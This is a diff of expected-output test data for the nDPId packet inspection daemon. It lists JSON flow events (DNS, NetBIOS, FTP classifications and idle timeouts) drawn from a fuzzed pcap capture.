+00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1401,37 +1401,37 @@ 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00831{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
-00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00831{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by 
port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
-00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
-00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}} 
+00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
